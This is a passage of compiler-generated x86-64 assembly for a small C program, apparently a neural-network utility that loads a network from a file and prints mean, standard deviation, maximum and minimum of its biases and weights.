movl $1024, %esi ## imm = 0x400
callq _fgets
movq -24(%rbp), %rdi
callq _atoi
## kill: def $al killed $al killed $eax
addb $48, %al
movb %al, -9(%rbp)
movb -9(%rbp), %al
subb $49, %al
jne LBB23_4
jmp LBB23_1
LBB23_1:
leaq L_.str.62(%rip), %rdi
movb $0, %al
callq _printf
movq -32(%rbp), %rdi
movq ___stdinp@GOTPCREL(%rip), %rax
movq (%rax), %rdx
movl $1024, %esi ## imm = 0x400
callq _fgets
movq -32(%rbp), %rdi
callq _InterfaceControleChaine
movq %rax, -40(%rbp)
movq -40(%rbp), %rdi
leaq L_.str.11(%rip), %rsi
callq _fopen
movq %rax, -8(%rbp)
cmpq $0, -8(%rbp)
jne LBB23_3
## %bb.2:
movq ___stderrp@GOTPCREL(%rip), %rax
movq (%rax), %rdi
leaq L_.str.63(%rip), %rsi
xorl %eax, %eax
## kill: def $al killed $al killed $eax
callq _fprintf
movl $1, %edi
callq _exit
LBB23_3:
movq -40(%rbp), %rsi
leaq L_.str.64(%rip), %rdi
movb $0, %al
callq _printf
jmp LBB23_7
LBB23_4:
leaq L_.str.65(%rip), %rdi
movb $0, %al
callq _printf
leaq L_.str.66(%rip), %rdi
leaq L_.str.11(%rip), %rsi
callq _fopen
movq %rax, -8(%rbp)
cmpq $0, -8(%rbp)
jne LBB23_6
## %bb.5:
movq ___stderrp@GOTPCREL(%rip), %rax
movq (%rax), %rdi
leaq L_.str.63(%rip), %rsi
xorl %eax, %eax
## kill: def $al killed $al killed $eax
callq _fprintf
movl $1, %edi
callq _exit
LBB23_6:
jmp LBB23_7
LBB23_7:
movq -8(%rbp), %rax
addq $64, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _mean ## -- Begin function mean
.p2align 4, 0x90
_mean: ## @mean
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
movq %rdi, -8(%rbp)
movl %esi, -12(%rbp)
xorps %xmm0, %xmm0
movsd %xmm0, -24(%rbp)
movl $0, -28(%rbp)
LBB24_1: ## =>This Inner Loop Header: Depth=1
movl -28(%rbp), %eax
cmpl -12(%rbp), %eax
jge LBB24_4
## %bb.2: ## in Loop: Header=BB24_1 Depth=1
movq -8(%rbp), %rax
movq 24(%rax), %rax
movslq -28(%rbp), %rcx
imulq $48, %rcx, %rcx
addq %rcx, %rax
movsd 8(%rax), %xmm0 ## xmm0 = mem[0],zero
addsd -24(%rbp), %xmm0
movsd %xmm0, -24(%rbp)
## %bb.3: ## in Loop: Header=BB24_1 Depth=1
movl -28(%rbp), %eax
addl $1, %eax
movl %eax, -28(%rbp)
jmp LBB24_1
LBB24_4:
movsd -24(%rbp), %xmm0 ## xmm0 = mem[0],zero
cvtsi2sdl -12(%rbp), %xmm1
divsd %xmm1, %xmm0
movsd %xmm0, -24(%rbp)
movsd -24(%rbp), %xmm0 ## xmm0 = mem[0],zero
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _standardDev ## -- Begin function standardDev
.p2align 4, 0x90
_standardDev: ## @standardDev
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $64, %rsp
movq %rdi, -8(%rbp)
movl %esi, -12(%rbp)
xorps %xmm0, %xmm0
movsd %xmm0, -24(%rbp)
movl $0, -28(%rbp)
LBB25_1: ## =>This Inner Loop Header: Depth=1
movl -28(%rbp), %eax
cmpl -12(%rbp), %eax
jge LBB25_4
## %bb.2: ## in Loop: Header=BB25_1 Depth=1
movq -8(%rbp), %rax
movq 24(%rax), %rax
movslq -28(%rbp), %rcx
imulq $48, %rcx, %rcx
addq %rcx, %rax
movsd 8(%rax), %xmm0 ## xmm0 = mem[0],zero
movsd %xmm0, -56(%rbp) ## 8-byte Spill
movq -8(%rbp), %rdi
movl -12(%rbp), %esi
callq _mean
movaps %xmm0, %xmm1
movsd -56(%rbp), %xmm0 ## 8-byte Reload
## xmm0 = mem[0],zero
subsd %xmm1, %xmm0
movsd %xmm0, -40(%rbp) ## 8-byte Spill
movq -8(%rbp), %rax
movq 24(%rax), %rax
movslq -28(%rbp), %rcx
imulq $48, %rcx, %rcx
addq %rcx, %rax
movsd 8(%rax), %xmm0 ## xmm0 = mem[0],zero
movsd %xmm0, -48(%rbp) ## 8-byte Spill
movq -8(%rbp), %rdi
movl -12(%rbp), %esi
callq _mean
movsd -48(%rbp), %xmm2 ## 8-byte Reload
## xmm2 = mem[0],zero
movaps %xmm0, %xmm1
movsd -40(%rbp), %xmm0 ## 8-byte Reload
## xmm0 = mem[0],zero
subsd %xmm1, %xmm2
movsd -24(%rbp), %xmm1 ## xmm1 = mem[0],zero
mulsd %xmm2, %xmm0
addsd %xmm1, %xmm0
movsd %xmm0, -24(%rbp)
## %bb.3: ## in Loop: Header=BB25_1 Depth=1
movl -28(%rbp), %eax
addl $1, %eax
movl %eax, -28(%rbp)
jmp LBB25_1
LBB25_4:
movsd -24(%rbp), %xmm0 ## xmm0 = mem[0],zero
cvtsi2sdl -12(%rbp), %xmm1
divsd %xmm1, %xmm0
sqrtsd %xmm0, %xmm0
movsd %xmm0, -24(%rbp)
movsd -24(%rbp), %xmm0 ## xmm0 = mem[0],zero
addq $64, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _maximum ## -- Begin function maximum
.p2align 4, 0x90
_maximum: ## @maximum
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
movq %rdi, -8(%rbp)
movl %esi, -12(%rbp)
movq -8(%rbp), %rax
movq 24(%rax), %rax
movsd 8(%rax), %xmm0 ## xmm0 = mem[0],zero
movsd %xmm0, -24(%rbp)
movl $1, -28(%rbp)
LBB26_1: ## =>This Inner Loop Header: Depth=1
movl -28(%rbp), %eax
cmpl -12(%rbp), %eax
jge LBB26_6
## %bb.2: ## in Loop: Header=BB26_1 Depth=1
movsd -24(%rbp), %xmm1 ## xmm1 = mem[0],zero
movq -8(%rbp), %rax
movq 24(%rax), %rax
movslq -28(%rbp), %rcx
imulq $48, %rcx, %rcx
addq %rcx, %rax
movsd 8(%rax), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
jbe LBB26_4
## %bb.3: ## in Loop: Header=BB26_1 Depth=1
movq -8(%rbp), %rax
movq 24(%rax), %rax
movslq -28(%rbp), %rcx
imulq $48, %rcx, %rcx
addq %rcx, %rax
movsd 8(%rax), %xmm0 ## xmm0 = mem[0],zero
movsd %xmm0, -24(%rbp)
LBB26_4: ## in Loop: Header=BB26_1 Depth=1
jmp LBB26_5
LBB26_5: ## in Loop: Header=BB26_1 Depth=1
movl -28(%rbp), %eax
addl $1, %eax
movl %eax, -28(%rbp)
jmp LBB26_1
LBB26_6:
movsd -24(%rbp), %xmm0 ## xmm0 = mem[0],zero
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _minimum ## -- Begin function minimum
.p2align 4, 0x90
_minimum: ## @minimum
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
movq %rdi, -8(%rbp)
movl %esi, -12(%rbp)
movq -8(%rbp), %rax
movq 24(%rax), %rax
movsd 8(%rax), %xmm0 ## xmm0 = mem[0],zero
movsd %xmm0, -24(%rbp)
movl $0, -28(%rbp)
LBB27_1: ## =>This Inner Loop Header: Depth=1
movl -28(%rbp), %eax
cmpl -12(%rbp), %eax
jge LBB27_6
## %bb.2: ## in Loop: Header=BB27_1 Depth=1
movq -8(%rbp), %rax
movq 24(%rax), %rax
movslq -28(%rbp), %rcx
imulq $48, %rcx, %rcx
addq %rcx, %rax
movsd 8(%rax), %xmm1 ## xmm1 = mem[0],zero
movsd -24(%rbp), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
jbe LBB27_4
## %bb.3: ## in Loop: Header=BB27_1 Depth=1
movq -8(%rbp), %rax
movq 24(%rax), %rax
movslq -28(%rbp), %rcx
imulq $48, %rcx, %rcx
addq %rcx, %rax
movsd 8(%rax), %xmm0 ## xmm0 = mem[0],zero
movsd %xmm0, -24(%rbp)
LBB27_4: ## in Loop: Header=BB27_1 Depth=1
jmp LBB27_5
LBB27_5: ## in Loop: Header=BB27_1 Depth=1
movl -28(%rbp), %eax
addl $1, %eax
movl %eax, -28(%rbp)
jmp LBB27_1
LBB27_6:
movsd -24(%rbp), %xmm0 ## xmm0 = mem[0],zero
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _statInfosBiais ## -- Begin function statInfosBiais
.p2align 4, 0x90
_statInfosBiais: ## @statInfosBiais
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $64, %rsp
movq %rdi, -8(%rbp)
movl $0, -44(%rbp)
movq $0, -56(%rbp)
movq -8(%rbp), %rax
movq 8(%rax), %rax
movq %rax, -56(%rbp)
leaq L_.str.67(%rip), %rdi
movb $0, %al
callq _printf
movl $0, -44(%rbp)
LBB28_1: ## =>This Inner Loop Header: Depth=1
movl -44(%rbp), %eax
movq -8(%rbp), %rcx
cmpl (%rcx), %eax
jge LBB28_6
## %bb.2: ## in Loop: Header=BB28_1 Depth=1
movl -44(%rbp), %esi
addl $1, %esi
leaq L_.str.68(%rip), %rdi
movb $0, %al
callq _printf
movq -56(%rbp), %rax
movq (%rax), %rax
movl 20(%rax), %esi
leaq L_.str.69(%rip), %rdi
movb $0, %al
callq _printf
movq -56(%rbp), %rax
movq (%rax), %rdi
movq -56(%rbp), %rax
movq (%rax), %rax
movl 20(%rax), %esi
callq _mean
movsd %xmm0, -16(%rbp)
movsd -16(%rbp), %xmm0 ## xmm0 = mem[0],zero
leaq L_.str.70(%rip), %rdi
movb $1, %al
callq _printf
movq -56(%rbp), %rax
movq (%rax), %rdi
movq -56(%rbp), %rax
movq (%rax), %rax
movl 20(%rax), %esi
callq _standardDev
movsd %xmm0, -24(%rbp)
movsd -24(%rbp), %xmm0 ## xmm0 = mem[0],zero
leaq L_.str.71(%rip), %rdi
movb $1, %al
callq _printf
movq -56(%rbp), %rax
movq (%rax), %rdi
movq -56(%rbp), %rax
movq (%rax), %rax
movl 20(%rax), %esi
callq _maximum
movsd %xmm0, -40(%rbp)
movsd -40(%rbp), %xmm0 ## xmm0 = mem[0],zero
leaq L_.str.72(%rip), %rdi
movb $1, %al
callq _printf
movq -56(%rbp), %rax
movq (%rax), %rdi
movq -56(%rbp), %rax
movq (%rax), %rax
movl 20(%rax), %esi
callq _minimum
movsd %xmm0, -32(%rbp)
movsd -32(%rbp), %xmm0 ## xmm0 = mem[0],zero
leaq L_.str.73(%rip), %rdi
movb $1, %al
callq _printf
leaq L_.str.45(%rip), %rdi
movb $0, %al
callq _printf
movq -56(%rbp), %rax
cmpq $0, 8(%rax)
jne LBB28_4
## %bb.3:
jmp LBB28_6
LBB28_4: ## in Loop: Header=BB28_1 Depth=1
movq -56(%rbp), %rax
movq 8(%rax), %rax
movq %rax, -56(%rbp)
## %bb.5: ## in Loop: Header=BB28_1 Depth=1
movl -44(%rbp), %eax
addl $1, %eax
movl %eax, -44(%rbp)
jmp LBB28_1
LBB28_6:
addq $64, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _statInfosPoids ## -- Begin function statInfosPoids
.p2align 4, 0x90
_statInfosPoids: ## @statInfosPoids
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $160, %rsp
movq %rdi, -8(%rbp)
movl $0, -28(%rbp)
movq $0, -40(%rbp)
movq -8(%rbp), %rax
movq 8(%rax), %rax
movq %rax, -40(%rbp)
leaq L_.str.74(%rip), %rdi
movb $0, %al
callq _printf
movl $0, -28(%rbp)
LBB29_1: ## =>This Loop Header: Depth=1
## Child Loop BB29_3 Depth 2
## Child Loop BB29_5 Depth 3
## Child Loop BB29_11 Depth 2
## Child Loop BB29_13 Depth 3
## Child Loop BB29_19 Depth 2
## Child Loop BB29_21 Depth 3
## Child Loop BB29_29 Depth 2
## Child Loop BB29_35 Depth 2
## Child Loop BB29_37 Depth 3
## Child Loop BB29_45 Depth 2
movl -28(%rbp), %eax
movq -8(%rbp), %rcx
cmpl (%rcx), %eax
jge LBB29_54
## %bb.2: ## in Loop: Header=BB29_1 Depth=1
movq -40(%rbp), %rax
movq (%rax), %rax
movslq 20(%rax), %rdi
shlq $3, %rdi
callq _malloc
movq %rax, -48(%rbp)
movq -40(%rbp), %rax
movq (%rax), %rax
movslq 20(%rax), %rdi
shlq $3, %rdi
callq _malloc
movq %rax, -56(%rbp)
movl -28(%rbp), %esi
addl $1, %esi
leaq L_.str.68(%rip), %rdi
movb $0, %al
callq _printf
movq -40(%rbp), %rax
movq (%rax), %rax
movl 20(%rax), %esi
leaq L_.str.75(%rip), %rdi
movb $0, %al
callq _printf
xorps %xmm0, %xmm0
movsd %xmm0, -64(%rbp)
xorps %xmm0, %xmm0
movsd %xmm0, -72(%rbp)
movl $0, -76(%rbp)
movl $0, -80(%rbp)
LBB29_3: ## Parent Loop BB29_1 Depth=1
## => This Loop Header: Depth=2
## Child Loop BB29_5 Depth 3
movl -80(%rbp), %eax
movq -40(%rbp), %rcx
movq (%rcx), %rcx
cmpl 20(%rcx), %eax
jge LBB29_10
## %bb.4: ## in Loop: Header=BB29_3 Depth=2
movl $0, -84(%rbp)
LBB29_5: ## Parent Loop BB29_1 Depth=1
## Parent Loop BB29_3 Depth=2
## => This Inner Loop Header: Depth=3
movl -84(%rbp), %eax
movq -40(%rbp), %rcx
movq (%rcx), %rcx
movq 24(%rcx), %rcx
movslq -28(%rbp), %rdx
imulq $48, %rdx, %rdx
addq %rdx, %rcx
cmpl (%rcx), %eax
jge LBB29_8
## %bb.6: ## in Loop: Header=BB29_5 Depth=3
movq -40(%rbp), %rax
movq (%rax), %rax
movq 24(%rax), %rax
movslq -80(%rbp), %rcx
imulq $48, %rcx, %rcx
addq %rcx, %rax
movq 16(%rax), %rax
movslq -84(%rbp), %rcx
movsd (%rax,%rcx,8), %xmm0 ## xmm0 = mem[0],zero
addsd -72(%rbp), %xmm0
movsd %xmm0, -72(%rbp)
movq -40(%rbp), %rax
movq (%rax), %rax
movq 24(%rax), %rax
movslq -80(%rbp), %rcx
imulq $48, %rcx, %rcx
addq %rcx, %rax
movl (%rax), %eax
addl -76(%rbp), %eax
movl %eax, -76(%rbp)
## %bb.7: ## in Loop: Header=BB29_5 Depth=3
movl -84(%rbp), %eax
addl $1, %eax
movl %eax, -84(%rbp)
jmp LBB29_5
LBB29_8: ## in Loop: Header=BB29_3 Depth=2
movsd -72(%rbp), %xmm0 ## xmm0 = mem[0],zero
addsd -64(%rbp), %xmm0
movsd %xmm0, -64(%rbp)
## %bb.9: ## in Loop: Header=BB29_3 Depth=2
movl -80(%rbp), %eax
addl $1, %eax
movl %eax, -80(%rbp)
jmp LBB29_3
LBB29_10: ## in Loop: Header=BB29_1 Depth=1
movsd -64(%rbp), %xmm0 ## xmm0 = mem[0],zero
cvtsi2sdl -76(%rbp), %xmm1
divsd %xmm1, %xmm0
movsd %xmm0, -64(%rbp)
movsd -64(%rbp), %xmm0 ## xmm0 = mem[0],zero
leaq L_.str.70(%rip), %rdi
movb $1, %al
callq _printf
xorps %xmm0, %xmm0
movsd %xmm0, -96(%rbp)
movl $0, -100(%rbp)
LBB29_11: ## Parent Loop BB29_1 Depth=1
## => This Loop Header: Depth=2
## Child Loop BB29_13 Depth 3
movl -100(%rbp), %eax
movq -40(%rbp), %rcx
movq (%rcx), %rcx
cmpl 20(%rcx), %eax
jge LBB29_18
## %bb.12: ## in Loop: Header=BB29_11 Depth=2
movl $0, -104(%rbp)
LBB29_13: ## Parent Loop BB29_1 Depth=1
## Parent Loop BB29_11 Depth=2
## => This Inner Loop Header: Depth=3
movl -104(%rbp), %eax
movq -40(%rbp), %rcx
movq (%rcx), %rcx
movq 24(%rcx), %rcx
movslq -100(%rbp), %rdx
imulq $48, %rdx, %rdx
addq %rdx, %rcx
cmpl (%rcx), %eax
jge LBB29_16
## %bb.14: ## in Loop: Header=BB29_13 Depth=3
movq -40(%rbp), %rax
movq (%rax), %rax
movq 24(%rax), %rax
movslq -100(%rbp), %rcx
imulq $48, %rcx, %rcx
addq %rcx, %rax
movq 16(%rax), %rax
movslq -104(%rbp), %rcx
movsd (%rax,%rcx,8), %xmm0 ## xmm0 = mem[0],zero
subsd -64(%rbp), %xmm0
movq -40(%rbp), %rax
movq (%rax), %rax
movq 24(%rax), %rax
movslq -100(%rbp), %rcx
imulq $48, %rcx, %rcx
addq %rcx, %rax
movq 16(%rax), %rax
movslq -104(%rbp), %rcx
movsd (%rax,%rcx,8), %xmm2 ## xmm2 = mem[0],zero
subsd -64(%rbp), %xmm2
movsd -96(%rbp), %xmm1 ## xmm1 = mem[0],zero
mulsd %xmm2, %xmm0
addsd %xmm1, %xmm0
movsd %xmm0, -96(%rbp)
## %bb.15: ## in Loop: Header=BB29_13 Depth=3
movl -104(%rbp), %eax
addl $1, %eax
movl %eax, -104(%rbp)
jmp LBB29_13
LBB29_16: ## in Loop: Header=BB29_11 Depth=2
jmp LBB29_17
LBB29_17: ## in Loop: Header=BB29_11 Depth=2
movl -100(%rbp), %eax
addl $1, %eax
movl %eax, -100(%rbp)
jmp LBB29_11
LBB29_18: ## in Loop: Header=BB29_1 Depth=1
movsd -96(%rbp), %xmm0 ## xmm0 = mem[0],zero
cvtsi2sdl -76(%rbp), %xmm1
divsd %xmm1, %xmm0
sqrtsd %xmm0, %xmm0
movsd %xmm0, -96(%rbp)
movsd -96(%rbp), %xmm0 ## xmm0 = mem[0],zero
leaq L_.str.71(%rip), %rdi
movb $1, %al
callq _printf
movl $0, -108(%rbp)
LBB29_19: ## Parent Loop BB29_1 Depth=1
## => This Loop Header: Depth=2
## Child Loop BB29_21 Depth 3
movl -108(%rbp), %eax
movq -40(%rbp), %rcx
movq (%rcx), %rcx
cmpl 20(%rcx), %eax
jge LBB29_28
## %bb.20: ## in Loop: Header=BB29_19 Depth=2
movq -40(%rbp), %rax
movq (%rax), %rax
movq 24(%rax), %rax
movslq -108(%rbp), %rcx
imulq $48, %rcx, %rcx
addq %rcx, %rax
movq 16(%rax), %rax
movsd (%rax), %xmm0 ## xmm0 = mem[0],zero
movsd %xmm0, -120(%rbp)
movl $1, -124(%rbp)
LBB29_21: ## Parent Loop BB29_1 Depth=1
## Parent Loop BB29_19 Depth=2
## => This Inner Loop Header: Depth=3
movl -124(%rbp), %eax
movq -40(%rbp), %rcx
movq (%rcx), %rcx
movq 24(%rcx), %rcx
movslq -108(%rbp), %rdx
imulq $48, %rdx, %rdx
addq %rdx, %rcx
cmpl (%rcx), %eax
jge LBB29_26
## %bb.22: ## in Loop: Header=BB29_21 Depth=3
movsd -120(%rbp), %xmm1 ## xmm1 = mem[0],zero
movq -40(%rbp), %rax
movq (%rax), %rax
movq 24(%rax), %rax
movslq -108(%rbp), %rcx
imulq $48, %rcx, %rcx
addq %rcx, %rax
movq 16(%rax), %rax
movslq -124(%rbp), %rcx
movsd (%rax,%rcx,8), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
jbe LBB29_24
## %bb.23: ## in Loop: Header=BB29_21 Depth=3
movq -40(%rbp), %rax
movq (%rax), %rax
movq 24(%rax), %rax
movslq -108(%rbp), %rcx
imulq $48, %rcx, %rcx
addq %rcx, %rax
movq 16(%rax), %rax
movslq -124(%rbp), %rcx
movsd (%rax,%rcx,8), %xmm0 ## xmm0 = mem[0],zero
movsd %xmm0, -120(%rbp)
LBB29_24: ## in Loop: Header=BB29_21 Depth=3
jmp LBB29_25
LBB29_25: ## in Loop: Header=BB29_21 Depth=3
movl -124(%rbp), %eax
addl $1, %eax
movl %eax, -124(%rbp)
jmp LBB29_21
LBB29_26: ## in Loop: Header=BB29_19 Depth=2
movsd -120(%rbp), %xmm0 ## xmm0 = mem[0],zero
movq -48(%rbp), %rax
movslq -108(%rbp), %rcx
movsd %xmm0, (%rax,%rcx,8)
## %bb.27: ## in Loop: Header=BB29_19 Depth=2
movl -108(%rbp), %eax
addl $1, %eax
movl %eax, -108(%rbp)
jmp LBB29_19
LBB29_28: ## in Loop: Header=BB29_1 Depth=1
movq -48(%rbp), %rax
movsd (%rax), %xmm0 ## xmm0 = mem[0],zero
movsd %xmm0, -24(%rbp)
movl $1, -128(%rbp)
LBB29_29: ## Parent Loop BB29_1 Depth=1
## => This Inner Loop Header: Depth=2
movl -128(%rbp), %eax
movq -40(%rbp), %rcx
movq (%rcx), %rcx
cmpl 20(%rcx), %eax
jge LBB29_34
## %bb.30: ## in Loop: Header=BB29_29 Depth=2
movsd -24(%rbp), %xmm1 ## xmm1 = mem[0],zero
movq -48(%rbp), %rax
movslq -128(%rbp), %rcx
movsd (%rax,%rcx,8), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
jbe LBB29_32
## %bb.31: ## in Loop: Header=BB29_29 Depth=2
movq -48(%rbp), %rax
movslq -128(%rbp), %rcx
movsd (%rax,%rcx,8), %xmm0 ## xmm0 = mem[0],zero
movsd %xmm0, -24(%rbp)
LBB29_32: ## in Loop: Header=BB29_29 Depth=2
jmp LBB29_33
LBB29_33: ## in Loop: Header=BB29_29 Depth=2
movl -128(%rbp), %eax
addl $1, %eax
movl %eax, -128(%rbp)
jmp LBB29_29
LBB29_34: ## in Loop: Header=BB29_1 Depth=1
movsd -24(%rbp), %xmm0 ## xmm0 = mem[0],zero
leaq L_.str.72(%rip), %rdi
movb $1, %al
callq _printf
movl $0, -132(%rbp)
LBB29_35: ## Parent Loop BB29_1 Depth=1
## => This Loop Header: Depth=2
## Child Loop BB29_37 Depth 3
movl -132(%rbp), %eax
movq -40(%rbp), %rcx
movq (%rcx), %rcx
cmpl 20(%rcx), %eax
jge LBB29_44
## %bb.36: ## in Loop: Header=BB29_35 Depth=2
movq -40(%rbp), %rax
movq (%rax), %rax
movq 24(%rax), %rax
movslq -132(%rbp), %rcx
imulq $48, %rcx, %rcx
addq %rcx, %rax
movq 16(%rax), %rax
movsd (%rax), %xmm0 ## xmm0 = mem[0],zero
movsd %xmm0, -144(%rbp)
movl $1, -148(%rbp)
LBB29_37: ## Parent Loop BB29_1 Depth=1
## Parent Loop BB29_35 Depth=2
## => This Inner Loop Header: Depth=3
movl -148(%rbp), %eax
movq -40(%rbp), %rcx
movq (%rcx), %rcx
movq 24(%rcx), %rcx
movslq -132(%rbp), %rdx
imulq $48, %rdx, %rdx
addq %rdx, %rcx
cmpl (%rcx), %eax
jge LBB29_42
## %bb.38: ## in Loop: Header=BB29_37 Depth=3
movsd -144(%rbp), %xmm0 ## xmm0 = mem[0],zero
movq -40(%rbp), %rax
movq (%rax), %rax
movq 24(%rax), %rax
movslq -132(%rbp), %rcx
imulq $48, %rcx, %rcx
addq %rcx, %rax
movq 16(%rax), %rax
movslq -148(%rbp), %rcx
ucomisd (%rax,%rcx,8), %xmm0
jbe LBB29_40
## %bb.39: ## in Loop: Header=BB29_37 Depth=3
movq -40(%rbp), %rax
movq (%rax), %rax
movq 24(%rax), %rax
movslq -132(%rbp), %rcx
imulq $48, %rcx, %rcx
addq %rcx, %rax
movq 16(%rax), %rax
movslq -148(%rbp), %rcx
movsd (%rax,%rcx,8), %xmm0 ## xmm0 = mem[0],zero
movsd %xmm0, -144(%rbp)
LBB29_40: ## in Loop: Header=BB29_37 Depth=3
jmp LBB29_41
LBB29_41: ## in Loop: Header=BB29_37 Depth=3
movl -148(%rbp), %eax
addl $1, %eax
movl %eax, -148(%rbp)
jmp LBB29_37
LBB29_42: ## in Loop: Header=BB29_35 Depth=2
movsd -144(%rbp), %xmm0 ## xmm0 = mem[0],zero
movq -56(%rbp), %rax
movslq -132(%rbp), %rcx
movsd %xmm0, (%rax,%rcx,8)
## %bb.43: ## in Loop: Header=BB29_35 Depth=2
movl -132(%rbp), %eax
addl $1, %eax
movl %eax, -132(%rbp)
jmp LBB29_35
LBB29_44: ## in Loop: Header=BB29_1 Depth=1
movq -56(%rbp), %rax
movsd (%rax), %xmm0 ## xmm0 = mem[0],zero
movsd %xmm0, -16(%rbp)
movl $1, -152(%rbp)
LBB29_45: ## Parent Loop BB29_1 Depth=1
## => This Inner Loop Header: Depth=2
movl -152(%rbp), %eax
movq -40(%rbp), %rcx
movq (%rcx), %rcx
cmpl 20(%rcx), %eax
jge LBB29_50
## %bb.46: ## in Loop: Header=BB29_45 Depth=2
movsd -16(%rbp), %xmm0 ## xmm0 = mem[0],zero
movq -56(%rbp), %rax
movslq -152(%rbp), %rcx
ucomisd (%rax,%rcx,8), %xmm0
jbe LBB29_48
## %bb.47: ## in Loop: Header=BB29_45 Depth=2
movq -56(%rbp), %rax
movslq -152(%rbp), %rcx
movsd (%rax,%rcx,8), %xmm0 ## xmm0 = mem[0],zero
movsd %xmm0, -16(%rbp)
LBB29_48: ## in Loop: Header=BB29_45 Depth=2
jmp LBB29_49
LBB29_49: ## in Loop: Header=BB29_45 Depth=2
movl -152(%rbp), %eax
addl $1, %eax
movl %eax, -152(%rbp)
jmp LBB29_45
LBB29_50: ## in Loop: Header=BB29_1 Depth=1
movsd -16(%rbp), %xmm0 ## xmm0 = mem[0],zero
leaq L_.str.76(%rip), %rdi
movb $1, %al
callq _printf
leaq L_.str.45(%rip), %rdi
movb $0, %al
callq _printf
movq -40(%rbp), %rax
cmpq $0, 8(%rax)
jne LBB29_52
## %bb.51:
jmp LBB29_54
LBB29_52: ## in Loop: Header=BB29_1 Depth=1
movq -40(%rbp), %rax
movq 8(%rax), %rax
movq %rax, -40(%rbp)
## %bb.53: ## in Loop: Header=BB29_1 Depth=1
movl -28(%rbp), %eax
addl $1, %eax
movl %eax, -28(%rbp)
jmp LBB29_1
LBB29_54:
addq $160, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _InfosStatistiques ## -- Begin function InfosStatistiques
.p2align 4, 0x90
_InfosStatistiques: ## @InfosStatistiques
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $352, %rsp ## imm = 0x160
movq ___stack_chk_guard@GOTPCREL(%rip), %rax
movq (%rax), %rax
movq %rax, -8(%rbp)
leaq L_.str.77(%rip), %rdi
movb $0, %al
callq _printf
leaq -290(%rbp), %rdi
movq ___stdinp@GOTPCREL(%rip), %rax
movq (%rax), %rdx
movl $2, %esi
callq _fgets
movl $0, -296(%rbp)
LBB30_1: ## =>This Inner Loop Header: Depth=1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl $10, -296(%rbp)
movb %al, -321(%rbp) ## 1-byte Spill
je LBB30_3
## %bb.2: ## in Loop: Header=BB30_1 Depth=1
cmpl $-1, -296(%rbp)
setne %al
movb %al, -321(%rbp) ## 1-byte Spill
LBB30_3: ## in Loop: Header=BB30_1 Depth=1
movb -321(%rbp), %al ## 1-byte Reload
testb $1, %al
jne LBB30_4
jmp LBB30_5
LBB30_4: ## in Loop: Header=BB30_1 Depth=1
callq _getchar
movl %eax, -296(%rbp)
jmp LBB30_1
LBB30_5:
movsbl -290(%rbp), %eax
cmpl $79, %eax
je LBB30_7
## %bb.6:
movsbl -290(%rbp), %eax
cmpl $111, %eax
jne LBB30_12
LBB30_7:
leaq L_.str.78(%rip), %rdi
movb $0, %al
callq _printf
leaq -272(%rbp), %rdi
movq ___stdinp@GOTPCREL(%rip), %rax
movq (%rax), %rdx
movl $256, %esi ## imm = 0x100
callq _fgets
leaq -272(%rbp), %rdi
movl $10, %esi
callq _strchr
movq %rax, -280(%rbp)
cmpq $0, %rax
je LBB30_9
## %bb.8:
movq -280(%rbp), %rax
movb $0, (%rax)
LBB30_9:
leaq -272(%rbp), %rdi
leaq L_.str.11(%rip), %rsi
callq _fopen
movq %rax, -288(%rbp)
cmpq $0, -288(%rbp)
jne LBB30_11
## %bb.10:
leaq L_.str.79(%rip), %rdi
callq _perror
movl $1, %edi
callq _exit
LBB30_11:
callq _initNetwork
movq %rax, -304(%rbp)
movq -304(%rbp), %rdi
movq -288(%rbp), %rsi
callq _loadNetwork
leaq L_.str.80(%rip), %rdi
movq %rdi, -344(%rbp) ## 8-byte Spill
xorl %eax, %eax
movl %eax, -328(%rbp) ## 4-byte Spill
movb %al, -329(%rbp) ## 1-byte Spill
callq _printf
## kill: def $ecx killed $eax
movb -329(%rbp), %al ## 1-byte Reload
movq -304(%rbp), %rcx
movl (%rcx), %esi
leaq L_.str.81(%rip), %rdi
callq _printf
movq -344(%rbp), %rdi ## 8-byte Reload
## kill: def $ecx killed $eax
movb -329(%rbp), %al ## 1-byte Reload
callq _printf
movq -304(%rbp), %rdi
callq _statInfosBiais
movq -304(%rbp), %rdi
callq _statInfosPoids
movl -328(%rbp), %edi ## 4-byte Reload
callq _exit
LBB30_12:
leaq L_.str.82(%rip), %rdi
leaq L_.str.11(%rip), %rsi
callq _fopen
movq %rax, -312(%rbp)
callq _initNetwork
movq %rax, -320(%rbp)
movq -320(%rbp), %rdi
movq -312(%rbp), %rsi
callq _loadNetwork
leaq L_.str.80(%rip), %rdi
movb $0, %al
callq _printf
movq -320(%rbp), %rax
movl (%rax), %esi
leaq L_.str.81(%rip), %rdi
movb $0, %al
